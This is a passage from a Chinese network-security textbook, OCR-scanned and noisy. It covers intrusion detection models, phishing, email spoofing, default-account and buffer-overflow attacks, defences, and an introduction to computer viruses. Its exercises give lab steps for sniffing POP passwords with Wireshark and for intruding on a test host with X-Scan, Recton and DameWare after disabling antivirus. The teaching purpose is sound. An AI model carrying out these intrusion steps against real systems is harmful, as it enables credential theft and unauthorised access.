被 审计 的 事件 与 已 知 的 入 侵 事 件 模 式 相 匹 配 时 , 即 报警 。 在 检测 方法 上 与 计算 机 病毒 的 检 
测 方式 类 似 。 目 前 基于 对 包 特 征 描 述 的 模式 匹配 应 用 较为 广泛 。 该 方法 的 优点 是 误 报 少 ， 
局 限 是 它 只 能 发 现 已 知 的 攻击 ,对 未 知 的 攻击 无 能 为 力 ,同时 由 于 新 的 攻击 方法 不 断 产生 、 
新 漏洞 不 断 发 现 ,攻击 特征 库 若 不 能 及 时 更 新 也 将 造成 IDS 漏 报 。 

2) 异常 检测 方法 

异常 检测 (Anomaly Detection) 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 。 根 据 这 一 
理念 建立 主体 正常 活动 的 “活动 简 档 ”, 将 当前 主体 的 活动 状况 与 “活动 简 档 ”" 相 比较 , 当 违 反 
其 统计 模型 时 ,认为 该 活动 可 能 是 “入 侵 ” 行 为 。 异 常 检测 的 难题 在 于 如 何 建立 “活动 简 档 ” 
以 及 如 何 设计 统计 模型 ,从 而 不 将 正常 的 操作 作为 “入侵” 或 忽略 真正 的 “入 侵 ” 行 为 。 常 用 
的 入 侵 检 测 5 种 统计 模型 为 操作 模型 .方差 ,多 元 模型 .马尔 柯 夫 过 程 模型 和 时 间 序 列 分 析 。 

(1) 操作 模型 。 利 用 常规 操作 特征 规律 与 假设 异常 情况 进行 比 对 ,可 通过 测量 结果 与 
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一 些 固 定 指标 相 比 较 , 固 定 指标 可 以 根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 ,在 短 时 间 内 
的 多 次 失败 的 登录 极 可 能 是 口令 尝试 攻击 。 

(2) 方差 。 主 要 通过 检测 计算 参数 的 统计 方差 , 设 定 其 检测 的 置信 区 间 , 当 测量 值 超过 
置信 区 间 的 范围 时 表明 有 可 能 是 异常 。 

(3) 多 元 模型 。 操 作 模型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 柯 夫 过 程 模型 。 将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 来 表示 
状态 的 变化 , 当 一 个 事件 发 生 时 ,或 状态 矩阵 该 转移 的 概率 较 小 则 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 。 是 将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ,如 果 一 个 新 事件 在 
该 时 间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 和 人 侵 。 


有 4. 入 侵 检测 及 防御 技术 的 发 展 态势 


1) 入 侵 检测 及 防御 技术 发 展 态势 

无 论 从 规模 与 方法 上 ,入 侵 技术 和 手段 都 在 不 断 发 展 变化 ,主要 反映 在 下 列 几 个 方面 : 
入 侵 或 攻击 的 综合 化 与 复杂 化 .入 侵 主体 对 象 的 间接 化 .入 侵 的 规模 扩大 化 .入 侵 技 术 的 分 
布 化 、 攻 击 对 象 的 转移 等 。 因 此 对 入侵 检测 与 防御 技术 的 要 求 也 越 来 越 高 ,检测 与 防御 的 方 
法 手段 也 越 来 越 复杂 。 未 来 的 入 侵 检测 与 防御 技术 大 致 有 三 个 发 展 方向 。 

(1) 分 布 式 入 侵 检 测 与 防御 。 

(2) 智能 化 入 侵 检测 及 防御 。 

(3) 全 面 的 安全 防御 方案 。 将 网 络 安 全 作为 一 个 整体 工程 来 处 理 。 

2) 统一 威胁 管理 

2004 年 9 月 ,全 球 著名 市 场 咨询 顾问 机 构 一 一 IDC( 国 际 数据 公司 ), 首 度 提 出 “统一 威 
胁 管理 ”(Unified Threat Management,UTM) 的 概念 ,即将 防 病毒 .和 人 侵 检测 和 防火 墙 安全 
设备 划 归 统一 威胁 管理 。IDC 将 防 病毒 .防火 墙 和 入 侵 检测 等 概念 融合 到 被 称 为 统一 威胁 
管理 的 新 类 别 中 ,该 概念 引起 了 业界 的 广泛 重视 ,并 推动 了 以 整合 式 安全 设备 为 代表 的 市 场 
细 分 的 诞生 。 

目前 ,UTM 常 定 义 为 由 硬件 .软件 和 网 络 技术 组 成 的 具有 专门 用 途 的 设备 , 它 主 要 提供 
一 项 或 多 项 安全 功能 ,同时 将 多 种 安全 特性 集成 于 一 个 硬件 设备 里 ,形成 标准 的 统一 威胁 管 
理 平台 。UTM 设备 应 该 具备 的 基本 功能 包括 网 络 防 火 墙 ` 网 络 人 侵 检测 与 防御 和 网 关 防 病 
毒 功 能 。 


| 3.7 ”其 他 攻防 技术 | 其 他 攻防 技术 


木马 和 密码 破解 技术 ,会 在 后 续 章 节 中 进行 介绍 。 其 他 的 一 些 攻防 技术 如 下 。 


Li. WWW 欺骗 技术 


WWW 欺骗 技术 是 指 黑客 自 改 访问 站 点 页 面 内 容 或 将 用 户 要 浏览 的 网 页 URL 改写 为 
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指向 黑客 自己 的 服务 器 。 例 如 ,黑客 将 用 户 要 浏览 的 网 页 的 URL 改写 为 指向 黑客 自己 的 服 
务 器 , 当 用 户 浏览 目标 网 页 的 时 候 , 实 际 上 是 向 黑客 服务 器 发 出 请 求 ,那么 黑客 就 可 以 达到 
欺骗 的 目的 了 。 

一 般 WWW 欺骗 使 用 两 种 技术 手段 。 

(1) URL 地 址 重 写 技术 和 相关 信息 掩盖 技术 。 利 用 URL 地 址 重 写 技术 ,攻击 者 可 以 
将 自己 的 Web 地 址 加 在 所 有 URL 地 址 的 前 面 。 由 于 浏览 器 一 般 均 设 有 地 址 栏 和 状态 栏 ， 
当 浏 览 器 与 某 个 站 点 连接 时 ,可 以 在 地 址 栏 和 状态 样 中 获得 连接 中 的 Web 站 点 地 址 及 其 相 
关 的 传输 信息 ,所 以 攻击 者 往往 在 URL 地 址 重 写 的 同时 ,利用 相关 信息 掩盖 技术 。 一 般 用 
JavaScript 程序 来 重 写 地 址 栏 和 状态 栏 。 

(2) 网 络 钓鱼 。 网 络 钓鱼 是 指 利用 欺骗 性 很 强 、 伪 造 的 Web 站 点 来 进行 诈骗 活动 ,目的 
在 于 钓 取 用 户 的 账户 资料 ,假冒 受害 者 进行 欺诈 性 金融 交易 ,从 而 获得 经 济 利益 。 近 几 年 
来 ,这 种 网 络 诈骗 在 我 国 急剧 攀 升 ,接连 出 现 了 利用 伪装 成 “中 国 银行 “中 国 工商 银行 "主页 
的 恶意 网 站 进行 诈骗 钱财 的 事件 。 网 络 钓鱼 的 作案 手法 主要 有 : 发 送 电 子 邮 件 以 虚假 信息 
引诱 用 户 中 圈套 ; 建立 假冒 的 网 上 银行 、 网 上 证 券 网 站 ,骗取 用 户 账号 密码 实施 盗窃 ; 利用 
虚假 的 电子 商务 进行 诈骗 ; 利用 木马 和 黑客 技术 等 手段 窃取 用 户 信息 后 实施 盗窃 ; 利用 用 
户 弱 口 令 的 漏洞 ,破解 、 猜 测 用 户 账 号 和 密码 等 。 网 络 钓鱼 从 攻击 角度 上 分 为 两 种 形式 ， 
@ 通 过 伪造 具有 ”概率 可 信 度 ”的 信息 来 欺骗 受害 者 ; @ 通 过 “身份 欺骗 "信息 来 进行 攻击 。 
可 以 被 用 作 网 络 钓鱼 的 攻击 技术 有 : URL 编码 结合 钓鱼 技术 , Web 漏洞 结合 钓鱼 技术 , 伪 
造 E-mail 地 址 结合 钓鱼 技术 ,浏览 器 漏洞 结合 钓鱼 技术 。 

防范 钓鱼 攻击 方法 如 下 。 

Q@ 可 以 对 钓鱼 攻击 利用 的 资源 进行 限制 。 例 如 , Web 漏洞 是 Web 服务 提供 商 可 以 直 
接 修补 的 ; 邮件 服务 商 可 以 使 用 域名 反 向 解析 邮件 发 送 服务 器 提醒 用 户 是 否 收 到 匿名 
邮件 。 

@ 及 时 修补 漏洞 。 如 浏览 器 漏洞 ,就 必须 打上 补丁 ,防御 攻击 者 直接 使 用 客户 端 软件 
漏洞 发 起 钓鱼 攻击 ,各 个 安全 软件 厂商 也 可 以 提供 修补 客户 端 软件 漏洞 的 功能 。 


12. 电子 邮件 攻击 


1) 电子 邮件 攻击 方式 

电子 邮件 欺骗 是 指 攻击 者 伴 称 自己 为 系统 管理 员 ( 邮 件 地 址 和 系统 管理 员 完 全 相同 )， 
给 用 户 发 送 邮件 要 求 用 户 修改 口令 (口令 为 指定 字符 串 ) 或 在 貌似 正常 的 附件 中 加 载 病毒 或 
其 他 木马 程序 ,这 类 欺骗 只 要 用 户 提高 警惕 ,一般 危害 性 不 是 太 大 。 

2) 防范 电子 邮件 攻击 的 方法 

(1) 使 用 邮件 程序 的 E-mail Notify 功能 过 滤 信 件 , 它 不 会 将 信件 直接 从 主机 上 下 载 下 
来 ,只 会 将 所 有 信件 的 头 部 信息 (Headers) 送 过 来 , 它 包 含 了 信件 的 发 送 者 ,信件 的 主题 等 
信息 。 

(2) 用 View 功能 检查 头 部 信息 ,看 到 可 疑 信件 ,可 直接 下 指令 将 它 从 主机 Server 端 删 
除 掉 。 
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(3) 拒 收 某 用 户 信件 。 在 收 到 某 特定 用 户 的 信件 后 ,自动 退回 (相当 于 查 无 此 人 )。 


ls. 利用 默认 账号 进行 攻击 


黑客 会 利用 操作 系统 提供 的 默认 账户 和 密码 进行 攻击 ,例如 许多 UNIX 主机 都 有 FTP 
和 Guest 等 默认 账户 (其 密码 和 账户 名 同名 ), 有 的 甚至 没有 口令 。 黑 客 用 UNIX 操作 系统 
提供 的 命令 如 Finger 和 Ruser 等 收集 信息 ,不 断 提 高 其 攻击 能 力 。 这 类 攻击 只 要 系统 管理 
员 提高 警惕 ,将 系统 提供 的 默认 账户 关 掉 或 提醒 无 口令 用 户 增加 口令 一 般 都 能 克服 。 


14. 缓冲 区 溢出 攻击 


缓冲 区 溢出 较为 常见 ,是 指 当 计算 机 向 缓冲 区 内 存储 调和 填充 数据 时 ,超过 了 缓冲 区 本 
身 限 定 的 容量 ,致使 溢出 的 数据 覆盖 在 合法 数据 上 。 

(1) 缓冲 区 溢出 。 这 种 攻击 可 能 导致 程序 不 运行 或 重启 等 后 果 。 其 至 可 利用 它 执行 非 
授权 指令 ,取得 系统 特权 ,进而 进行 各 种 非法 操作 。 如 利用 堆栈 溢出 ,改变 返回 程序 的 地 址 ， 
或 导致 拒绝 服务 ,或 跳 转 并 执行 一 段 恶 意 代码 。 

(2) 缓冲 区 溢出 攻击 。 是 指 通过 向 缓冲 区 写 入 超出 其 长 度 的 大 量 文 件 或 信息 内 容 , 造 
成 缓冲 区 溢出 ,破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 或 使 攻击 者 自 夺 程序 运行 的 控 
制 权 。 

(3) 缓冲 区 溢出 攻击 的 防范 方法 。 主 要 是 提高 软件 编程 正确 性 可 靠 性 。 利 用 编译 器 的 
边界 检查 实现 缓冲 区 保护 ,使 缓冲 区 溢出 不 出 现 。 程 序 指针 完整 性 检查 是 一 种 间接 方法 ,在 
程序 指针 失效 前 进行 完整 性 检查 ,可 以 阻止 绝 大 多 数 的 缓冲 区 溢出 攻击 。 


3.8 网 络 攻击 的 防范 措施 


黑客 攻击 事件 为 网 络 系统 的 安全 带 来 了 严重 的 威胁 与 严峻 的 挑战 。 采 取 积 极 有 效 的 防 
范 措施 将 会 减少 损失 ,提高 网 络 系统 的 安全 性 和 可 靠 性 。 普 及 网 络 安全 知识 教育 ,提高 对 网 
络 安全 重要 性 的 认识 ,增强 防范 意识 ,强化 防范 措施 ,切实 增强 用 户 对 网 络 入 侵 的 认识 和 自 
我 防范 能 力 , 是 抵御 和 防范 黑客 攻击 \ 确 保 网 络 安全 的 基本 途径 。 


有 1. 网 络 攻击 的 防范 策略 


防范 黑客 攻击 要 在 主观 上 重视 ,客观 上 积极 采取 措施 ,制定 规章 制度 和 管理 制度 , 普 
网 络 安全 教育 ,使 用 户 掌握 网 络 安全 知识 和 有 关 的 安全 策略 。 管 理 上 应 当 明 确 安 全 对 象 , 设 
置 强 有 力 的 安全 保障 体系 ,按照 安全 等 级 保护 条 例 对 网 络 实施 保护 。 认 真 制定 有 针对 性 的 
防 攻 击 方法 ,使 用 科技 手段 有 的 放 矢 ,在 网 络 中 层 层 设防 ,使 每 一 层 都 成 为 一 道 关卡 ,从 而 
让 攻击 者 无 隙 可 钻 、 无 计 可 施 。 防 范 黑客 攻击 的 技术 主要 有 : 数据 加 密 、 身 份 认证 、 数 字 签 
名 ,建立 完善 的 访问 控制 策略 ,安全 审计 等 。 技 术 上 要 注重 研发 新 方法 ,同时 还 必须 做 到 未 
雨 绸 纪 ,预防 为 主 ,将 重要 的 数据 备份 并 时 刻 注意 系统 运行 状况 。 
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12. 网 络 攻击 的 防范 措施 


通常 ,具体 防范 攻击 措施 与 步骤 包括 以 下 内 容 。 

(1) 加 强 网 络 安全 防范 法 律 法 规 等 方面 的 宣传 和 教育 ,提高 安全 防范 意识 。 

(2) 加 固 网 络 系统 ,及 时 下 载 、 安 装 系统 补丁 程序 。 

(3) 尽量 避免 从 Internet 下 载 不 知名 的 软件 .游戏 程序 。 

(4) 不 要 随意 打开 来 历 不 明 的 电子 邮件 及 文件 ,运行 不 熟悉 的 人 给 用 户 的 程序 。 

(5) 不 随便 运行 黑客 程序 ,不 少 这 类 程序 运行 时 会 主动 泄露 用 户 的 个 人 信息 。 

(6) 在 支持 HTML 的 BBS 上 ,如 发 现 提交 警告 , 先 看 源 代码 ,预防 骗取 密码 。 

(7) 设置 安全 密码 。 使 用 字母 数字 混 排 ,常用 的 密码 设置 不 同 , 重 要 密码 经 常 更 换 。 

(8) 使 用 防 病毒 . 防 黑客 等 防火 墙 软件 ,以 阻挡 外 部 网 络 的 入 侵 。 

(9) 隐藏 自身 IP 地 址 。 可 采取 的 方法 有 : 使 用 代理 服务 器 进行 中 转 , 用 户 上 网 聊天 、 
BBS 等 不 会 留 下 自己 的 IP; 使 用 工具 软件 ,如 用 Norton Internet Security 来 隐藏 主机 地 址 ， 
避免 在 BBS 和 聊天 室 暴 露 个 人 信息 。 

【案例 3-5】 设置 代理 服务 器 。 外 部 网 络 向 内 部 网 络 申请 某 种 网 络 服务 时 ,代理 服务 器 
接受 申请 ,然后 根据 其 服务 类 型 \ 服 务 内 容 、 被 服务 的 对 象 \. 服 务 者 申请 的 时 间 、 申 请 者 的 域 
名 范围 等 来 决定 是 否 接受 此 项 服务 ,如 果 接 受 , 它 就 向 内 部 网 络 转发 这 项 请 求 。 

(10) 切实 做 好 端口 防范 。 一 方面 安装 端口 监视 程序 ; 另 一 方面 将 不 用 的 一 些 端口 关闭 。 

(11) 加 强 下 浏览 器 对 网 页 的 安全 防护 。 主 要 通过 对 IE 属性 的 设置 提高 访问 网 页 安 
全 性 。 

(12) 上 网 前 备份 注册 表 。 许 多 黑客 攻击 会 对 系统 注册 表 进 行 修改 。 

(13) 加 强 管理 。 将 防 病毒 、 防 黑客 形成 惯例 ,当成 日 常 例 行 工作 ,定时 更 新 防毒 软件 ,将 
防毒 软件 保持 在 常 驻 状 态 ,以 彻底 防毒 。 由 于 黑客 经 常会 针对 特定 的 日 期 发 动 攻击 ,计算 机 用 
户 在 此 期 间 应 特别 提高 警戒 。 对 于 重要 的 个 人 资料 做 好 严密 的 保护 ,并 养 成 资料 备份 的 习惯 。 
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Li. 选择 题 
(1) 在 黑客 攻击 技术 中 ， 是 黑客 发 现 获得 主机 信息 的 一 种 最 佳 途径 。 
A. 端口 扫描 B. 缓冲 区 溢出 
C. 网 络 监听 D. 口令 破解 
(2) 一 般 情 况 下 ,大 多 数 监 听 工 具 不 能 够 分 析 的 协议 是 
A. 标准 以 太 网 B. TCR/ 下 
C. SNMP 和 CMIS D. IPX 和 DECNet 
(3) 改变 路 由 信息 ,修改 Windows NT 注册 表 等 行为 属于 拒绝 服务 攻击 的 过 或。 
A. 资源 消耗 型 B. 配置 修改 型 
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C. 服务 利用 型 D. 物理 破坏 型 
(4) 利用 以 太 网 的 特点 ,将 设备 网 卡 设置 为 “混杂 模式 ”, 从 而 能 够 接收 整个 以 
太 网 内 的 网 络 数据 信息 。 
A. 缓冲 区 溢出 攻击 B. 木马 程序 
C. 嗅 探 程序 D. 拒绝 服务 攻击 
(5) 字典 攻击 被 用 于 
A. 用 户 欺 骗 B. 远程 登录 
C. 网 络 嗅 探 D. 破解 密码 
上 2. 填空 是 
(1) 黑客 的 攻击 五 部 曲 是 





(2) 黑客 攻击 计算 机 的 手段 可 分 为 破坏 性 攻击 和 非 破坏 性 攻击 。 常 见 的 黑客 行为 有 : 
. 、 告 知 漏洞 .获取 目标 主机 系统 的 非法 访问 权 。 
(3) 就 是 利用 更 多 的 倪 介 机 对 目标 发 起 进攻 , 比 从 前 更 大 的 规模 进攻 受害 者 。 
(4) 按 数 据 来 源 和 系统 结构 分 类 ,入侵 检测 系统 分 为 3 类 : 
和 


上 3. 简 答题 


(1) 一 般 的 系统 攻击 有 哪些 步 又? 各 步骤 主要 完成 哪些 工作 ? 
(2) 扫描 工具 只 是 黑客 攻击 的 工具 吗 ? 
(3) 端口 扫描 分 为 哪 几 类 ? 原理 是 什么 ? 


上 4. 操作 题 


(1) 尝试 使 用 Wireshark 工具 , 抓 取 第 三 方 客户 端 收发 邮件 时 POP 的 密码 信息 。 

(2) 用 X-Scan、Recton、DameWare 工具 进行 模拟 入 侵 攻击 。 

要 求 如 下 。 

Q@ 由 于 本 次 模拟 攻击 所 用 到 的 工具 软件 均 可 被 较 新 的 杀毒 软件 和 防火 墙 检 测 出 来 并 
自动 进行 隔离 或 删除 ,因此 ,在 模拟 攻击 前 要 先 将 两 台 主 机 安装 的 杀毒 软件 和 Windows 防 
火 墙 等 全 部 关闭 。 

@ 在 默认 的 情况 下 ,两 台 主 机 的 IPC $ 共享 .默认 共享 .135 端口 和 WMI(Windows 
Management Instrumentation, Windows 管理 规范 ) 服 务 均 处 于 开启 状态 ,在 主机 了 B 上 禁用 
Terminal Services 服务 (主要 用 于 远程 桌面 连接 ) 后 重新 启动 计算 机 。 

@ 设置 主机 A( 攻 击 机 ) 的 IP 地 址 为 192. 168. 1. 101 ,主机 B( 被 攻击 机 ) 的 IP 地 址 为 
192. 168. 1. 102(IP 地 址 可 以 根据 实际 情况 自行 设 定 ), 两 台 主 机 的 子 网 掩 码 均 为 255. 255. 
255.0。 设 置 完成 后 用 ping 命令 测试 两 台 主 机 连接 成 功 。 

@ 为 主机 B 添加 管理 员 用 户 abc, 密 码 为 123。 

@ 利用 X-Scan 扫描 器 得 到 远程 主机 B 的 弱 口 令 ; 利用 Recton 工具 远程 人 侵 主机 B; 
利用 DameWare 软件 远程 监控 主机 B。 
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本 章 介绍 计算 机 病毒 的 概念 、 发 展 历程 分 类 ,特征 和 传播 途径 等 知识 。 通 过 本 章 的 学 
习 , 应 熟练 掌握 网 络 安全 维护 中 最 基本 的 防 病毒 技术 ,掌握 木马 传播 与 运行 的 机 制 ,学 会 防 
御 木 马 的 相关 知识 。 


多 > 知识 点 


(1) 计算 机 病毒 的 概念 。 
(2) 计算 机 病毒 的 传播 途径 。 
(3) 计算 机 防 病毒 的 原理 。 
(4) 木马 的 传播 。 

(5) 防 病毒 工具 的 使 用 。 


局 司 雪 学 B 标 


(1) 了 解 计算 机 病毒 的 概念 及 发 展 历程 。 

(2) 掌握 病毒 的 分 类 与 特征 。 

(3) 了 解 常见 类 型 的 计算 机 病毒 实例 。 

(4) 掌握 计算 机 防 病毒 的 基本 原理 。 

(5) 掌握 杀毒 软件 和 其 他 安全 防护 工具 的 配置 和 使 用 。 
(6) 了 解 木马 的 概念 和 运行 机 制 。 

(7) 掌握 防御 木马 的 相关 知识 。 
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| 4.1 计算 机 病毒 概述 | 1 计算 机 病毒 概述 


计算 机 病毒 和 恶意 软件 问题 ,是 对 计算 机 网 络 系统 影响 范围 最 广 且 经 常 遇 到 的 安全 威 
胁 和 隐患 。 计 算 机 网 络 系统 如 果 受 到 计算 机 病毒 和 恶意 软件 的 侵扰 ,就 会 出 现 轻 者 影响 系 
统 运行 .使 用 和 服务 , 重 者 导致 文件 和 系统 损坏 ,甚至 导致 服务 器 和 网 络 系 统 的 瘫痪 ,所 以 ， 
加 强 防范 计算 机 病毒 和 恶意 软件 极为 重要 。 

【案例 4-1】 计算 机 病毒 概念 的 起 源 。 在 第 一 台 商用 计算 机 推出 前 ,计算 机 先驱 冯 。 诺 
依 曼 (John Von Neumann) 在 一 篇 论文 中 , 曾 初步 概述 了 病毒 程序 的 概念 。 当 时 , 绝 大 部 分 
的 计算 机 专家 都 无 法 想象 会 有 这 种 能 自我 繁殖 的 程序 。 美 国 著 名 的 AT&T 贝尔 实验 室 中 ， 
三 个 年 轻 人 工作 之 余 开 发 了 一 种 “ 磁 芯 大 战 ”(Core War) 的 游戏 ,他 们 编 出 能 吃 掉 别 人 编码 
的 程序 以 进行 互相 攻击 ,这 种 游戏 呈现 出 病毒 程序 的 感染 性 和 破坏 性 。 最 早 科学 定义 出 现 
在 1983 年 Fred Cohen( 南 加 大 ) 的 博士 论文 中 。 


P 4.1.1 计算 机 病毒 的 基本 概念 


和. 计算 机 病毒 的 概念 


计算 机 病毒 (Computer Viruses) 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 
被 明确 定义 为 “编制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 
用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 在 一 般 教科 书 及 通用 资料 中 被 定 
义 为 :“ 利 用 计算 机 软件 与 硬件 的 缺陷 或 操作 系统 漏洞 ,由 被 感染 机 内 部 发 出 的 破坏 计算 机 
数据 并 影响 计算 机 正常 工作 的 一 组 指令 集 或 程序 代码 .” 国 外 关于 计算 机 病毒 最 流行 的 定义 
是 :“ 计 算 机 病毒 是 一 段 依附 在 其 他 程序 上 的 可 进行 自我 繁殖 的 程序 代码 。” 

由 于 计算 机 病毒 与 生物 学 病毒 特性 很 类 似 ,因此 得 名 。 现 在 ,计算 机 病毒 也 可 通过 网 络 
系统 传播 感染 、 攻 击 和 破坏 ,因此 ,也 称 为 计算 机 网 络 病毒 ,简称 病毒 。 

具有 计算 机 病毒 的 特征 及 危害 的 特洛伊 木马 (Trojan Horse) ,广义 上 也 应 归 为 计算 机 
病毒 。 


上 2. 计算 机 病毒 的 发 展 


随 着 计算 机 及 其 网 络 技术 的 快速 发 展 , 计 算 机 病毒 日 趋 复杂 多 变 , 其 破坏 性 和 传播 能 力 
也 不 断 增强 。 计 算 机 病毒 发 展 主要 经 历 了 五 个 重要 阶段 : 原始 病毒 阶段 、 混 合 型 病毒 阶段 、 
多 态 性 病毒 阶段 .网 络 病毒 阶段 .主动 攻击 型 病毒 阶段 。 








上 3. 计算 机 病毒 的 产生 原因 


计算 机 病毒 的 起 因 和 来 源 情况 各 异 , 有 的 是 为 了 某 种 目的 ,分 为 个 人 行为 和 集团 行为 两 
种 。 有 的 病毒 还 曾 为 用 于 研究 或 实验 而 设计 的 “有 用 ”程序 ,后 来 失 制 扩散 或 被 利用 。 
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计算 机 病毒 的 产生 原因 主要 有 以 下 4 个 方面 。 


(1) 恶作剧 型 。 个 别 计算 机 爱好 者 为 了 炫 漆 表现 个 人 的 高 超 技 能 和 智慧 ,凭借 对 软 硬 
件 的 深入 了 解 , 编 制 一 些 特殊 的 程序 。 通 过 载体 传播 后 ,在 一 定 条 件 下 被 触发 。 

(2) 报复 心理 型 。 个 别 软件 研发 人 员 感 到 不 满 ,编制 发 泄 程 序 。 如 某 公 司职 员 在 职 期 
间 编 制 了 一 段 代码 隐藏 在 其 系统 中 , 当 检 测 到 他 的 工资 减少 时 ,立即 发 作 破 坏 系统 。 

(3) 版 权 保 护 型 。 由 于 很 多 商业 软件 经 常 被 非法 复制 ,一 些 开 发 商 为 了 保护 自己 的 经 
济 利益 制作 了 一 些 特殊 程序 附加 在 软件 产品 中 。 如 Pakistan 病毒 ,其 制作 目的 是 为 了 保护 
自身 利益 ,并 追踪 那些 非法 复制 其 产品 的 用 户 。 

(4) 特殊 目的 型 。 为 达到 某 种 特殊 目的 而 研发 的 程序 ,对 机 构 的 特殊 系统 进行 干扰 或 
破坏 。 


上 4. 计算 机 病毒 的 命名 方式 


为 了 进行 防范 和 研究 防 病毒 技术 ,需要 规范 计算 机 病毒 命名 方式 。 通 常 根据 病毒 的 特 
征 和 对 用 户 造成 的 影响 等 多 方面 情况 来 确定 ,由 防 病毒 厂商 给 出 一 个 合适 名 称 。 目 前 ,公安 
部 门 也 正在 规范 病毒 的 命名 ,基本 上 是 采用 前 后 级 法 来 进行 命名 。 命 名 方式 由 多 个 前 级 与 
后 组 组 合 ,中 间 以 点 “. "分隔, 一 般 格式 为 : 前 级 . 病毒 名 . 后 级 。 如 振荡 波 蠕虫 病毒 的 变种 
Worm，Sasser. c, 其 中 Worm 指 病毒 的 种 类 为 蠕虫 ,Sasser 是 病毒 名 ,c 指 该 病毒 的 变种 。 

(1) 病毒 前 级 。 表 示 一 个 病毒 的 种 类 ,如 木马 病毒 的 前 级 是 Trojan。 

(2) 病毒 名 。 即 病毒 的 名 称 , 如 “病毒 之 母 "CIH 病毒 及 其 变种 的 名 称 一 律 为 CIH。 

(3) 病毒 后 级 。 表 示 一 个 病毒 的 变种 特征 ,一 般 采 用 英文 中 的 26 个 字母 表示 。 如 
Worm. Sasser. c 是 指 振荡 波 蠕 虫 病毒 的 变种 c。 


PP 4.1.2 计算 机 病毒 的 主要 特点 
根据 对 病毒 的 产生 ,传播 和 破坏 行为 的 分 析 , 可 将 病毒 概括 为 6 个 主要 特点 。 


EL 传播 性 


传播 性 是 病毒 的 基本 特点 。 与 生物 病毒 类 似 , 计 算 机 病毒 也 会 通过 各 种 途径 传播 扩散 ， 
在 一 定 条 件 下 造成 被 感染 的 计算 机 系统 工作 失常 ,甚至 瘫痪 。 计 算 机 病毒 一 旦 进入 系统 并 
运行 ,就 会 搜寻 其 他 适合 其 传播 条 件 的 程序 或 存储 介质 ,确定 目标 后 再 将 自身 代码 插入 其 
中 ,达到 自我 繁殖 的 目的 。 对 于 感染 病毒 的 计算 机 系统 ,如 果 发 现 处 理 不 及 时 ,病毒 就 会 在 
这 台 机 器 上 迅速 扩散 ,大 量 文件 会 被 感染 ,致使 被 感染 的 文件 又 成 了 新 的 传播 源 。 


12. 算 夺 系统 控制 权 


一 般 正 常 的 程序 对 用 户 的 功能 和 目的 性 很 明确 ; 病毒 不 仅 具 有 正常 程序 的 一 切 特 性 ， 
而 且 隐 藏 在 其 中 , 当 用 户 调用 正常 程序 时 自 夺 系统 的 控制 权 , 先 于 正常 程序 执行 ,病毒 的 动 
作 、 目 的 对 用 户 往往 是 未 知 的 ,未 经 用 户 人 允许 。 
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EB. 隐蔽 性 


病毒 与 正常 程序 只 有 经 过 代码 分 析 才 能 区 别 。 一 般 在 无 防护 措施 情况 下 ,病毒 程序 取 
得 系统 控制 权 后 ,可 在 很 短 的 时 间 内 传播 扩散 。 中 毒 的 计算 机 系统 通常 仍 能 正常 运行 ,使 用 
户 不 会 感到 任何 异常 。 其 隐蔽 性 还 体现 在 病毒 代码 本 身 设计 得 较 短 小 ,一 般 只 有 几 百 到 几 
千 字 节 ,非常 便于 隐藏 到 其 他 程序 中 或 磁盘 的 某 一 特定 区 域内 。 随 着 病毒 编写 技巧 的 提高 ， 
病毒 代码 本 身 加 密 或 变异 ,使 对 其 查找 和 分 析 更 困难 , 且 易 造成 漏 查 或 错 杀 。 


14. 破坏 性 


侵入 系统 的 任何 病毒 ,都 会 对 系统 及 应 用 程序 产生 影响 ,如 占用 系统 资源 、 降 低 计算 机 
工作 效率 ,甚至 可 导致 系统 崩溃 。 其 破坏 性 多 种 多 样 , 除 了 极 少 数 病毒 只 窥视 信息 、 显 示 画 
面 或 播放 音乐 .占用 系统 资源 外 , 绝 大 部 分 病毒 包含 损害 、 破 坏 计算 机 系统 的 代码 ,破坏 目的 
非常 明确 ,如 破坏 数据 ,删除 文件 .加密 磁 盘 .格式 化 磁盘 或 破坏 主板 等 。 

【案例 4-2】 会 扫 票 的 病毒 “比特 币 敲 诈 者 "。 比 特 币 是 一 种 新 兴 的 网 络 庶 拟 货 币 , 因 可 
兑换 成 大 多 数 国家 的 货币 而 在 全 世界 广 受 追捧 。2015 年 1 月 首次 现 身 中 国 的 “比特 币 敲 诈 
者 ”病毒 呈 指 数 级 爆发 ,腾讯 反 病 毒 实验 室 发 现 其 变种 , 仅 5 月 7 日 当天 新 变种 数 就 已 达 
13 万 ,不 仅 敲诈 勒索 用 户 , 甚 至 还 能 盗 取 个 人 隐私 。 从 攻击 源 看 是 由 黑客 控制 的 僵尸 网 络 
以 网 络 邮件 为 传播 载体 发 起 的 一 场 风暴 。 一 种 名 为 CTB-Locker 的 “比特 币 项 诈 者 ”病毒 也 
建 虞 全 球 ,通过 远程 加 密 用 户 计算 机 文档 .图 片 等 文件 ,向 用 户 勒索 赎金 ,否则 这 些 加 密 文 档 
将 在 指定 时 间 永 久 搓 票 。 腾 讯 电 脑 管家 可 精准 识别 ,并 完美 查 杀 ,保障 用 户 计算 机 安全 。 


有 5. 潜伏 性 


绝 大 部 分 的 计算 机 病毒 感染 系统 之 后 一 般 不 会 马上 发 作 , 可 长 期 隐藏 在 系统 中 ,只 有 当 
满足 其 特定 条 件 时 才 启动 其 破坏 代码 ,显示 发 作 信息 或 破坏 系统 。 和 触发 条 件 主要 有 三 种 。 

(1) 以 系统 时 钟 为 触发 器 ,这 种 触发 机 制 被 大 量 病毒 使 用 。 

(2) 病毒 自 带 计数 器 触发 。 以 计数 器 记录 某 种 事件 发 生 的 次 数 ,达到 设 定 值 后 执行 破 
坏 操作 。 如 开机 次 数 、 病 毒 运 行 的 次 数 等 。 

(3) 以 执行 某 些 特定 操作 为 触发 。 以 某 些 特定 的 组 合 键 , 对 磁盘 的 读 写 或 执行 的 命令 
